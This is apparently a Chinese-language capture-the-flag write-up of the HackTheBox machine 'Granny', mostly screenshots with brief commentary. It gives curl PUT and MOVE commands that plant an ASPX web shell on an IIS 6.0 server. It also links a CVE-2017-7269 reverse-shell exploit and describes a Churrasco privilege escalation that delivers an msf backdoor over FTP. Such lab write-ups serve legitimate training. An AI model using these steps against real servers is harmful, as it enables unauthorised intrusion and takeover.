Granny - HackTheBox
Td

image

nmap扫描

image

image

image

80端口开放的IIS服务为6.0,且扫描结果中显示支持put以及move等方法,此时即可利用IIS6.0的PUT方法进行上传shell

image

先将shell以txt文件形式上传

curl -X PUT http://10.10.10.15/test.txt --data-binary @cmdasp.aspx -vvvvv

image

之后利用MOVE将shell文件进行改名

curl -X MOVE http://10.10.10.15/test.txt -H "Destination: /test.aspx" -vvvvv

image

image

由于这台机子是2003,不具备powershell

image

搜了一下6.0的exp

image

image

利用这个缓冲区溢出进行获取shell

修改一下IP

image

image

image

貌似没作用

https://github.com/k4u5h41/CVE-2017-7269/blob/main/ii6_reverse_shell.py

利用这个,利用python2执行

image

image

提权

image

利用Churrasco.exe进行提权

image

https://github.com/rayhan0x01/reverse-shell-able-exploit-pocs/blob/master/ms09-012.md

利用ftp上传exp

image

而ftp有一个骚操作,将需要执行的ftp命令事先写入一个文本中,将文本上传到靶机,之后利用ftp -n -v -s:ftp.txt,进行执行,从而达到自动化操作

准备好提权exp和msf生成一个后门shell

image

将ftp.txt文件同样用put方法上传上去

image

image

然后在本地利用python开启一个ftp服务

python3 -m pyftpdlib -p 21

image

image

image

image

然后利用churraskito去执行shell程序

image

image

image

image